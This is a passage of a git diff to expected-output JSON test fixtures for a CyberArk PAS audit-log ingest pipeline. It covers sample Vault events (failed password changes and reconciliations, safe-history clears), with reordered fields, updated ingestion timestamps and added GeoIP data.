Error code:9002\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1616673608\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580255\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 
Error code:9002\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011989\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1576120341\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"No\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 08:00:08\",\"IsoTimestamp\":\"2021-03-25T12:00:08Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"57\",\"Desc\":\"CPM Change Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux Accounts\",\"File\":\"Root\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 
Error code:9002\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall2;\",\"Message\":\"CPM Change Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"firecall2\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1616673608\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580255\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011989\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1576120341\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"No\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "57", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json index b67bb987722..3ce9605eafc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json 
@@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,14 +38,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-12-09T13:37:08.157345200Z", + "ingested": "2021-12-14T14:42:37.050594232Z", "original": "\u003c5\u003e1 2021-03-04T19:25:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:25:02\",\"IsoTimestamp\":\"2021-03-04T19:25:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { 
@@ -92,7 +92,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-12-09T13:37:08.157354300Z", + "ingested": "2021-12-14T14:42:37.050596755Z", "original": "Mar 08 03:10:31 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" @@ -102,18 +102,6 @@ ] }, { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -129,6 +117,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -146,14 +139,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-12-09T13:37:08.157360200Z", + "ingested": "2021-12-14T14:42:37.050597260Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"System\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json index 9fa0357de03..a2d4f6f93ec 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json @@ -7,6 +7,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -87,7 +96,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403065Z", + "ingested": "2021-12-14T14:42:37.331268042Z", "original": "\u003c7\u003e1 2021-03-11T21:12:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615497142\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:12:22\",\"IsoTimestamp\":\"2021-03-11T21:12:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password 
Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615497142\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -116,6 +125,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -197,7 +215,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403073500Z", + "ingested": "2021-12-14T14:42:37.331271168Z", "original": "\u003c7\u003e1 2021-03-14T13:18:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615727895\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:18:15\",\"IsoTimestamp\":\"2021-03-14T13:18:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615727895\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -226,6 +244,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -305,7 +332,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403079100Z", + "ingested": "2021-12-14T14:42:37.331271716Z", "original": "\u003c7\u003e1 2021-03-14T13:46:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:46:13\",\"IsoTimestamp\":\"2021-03-14T13:46:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -334,6 +361,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
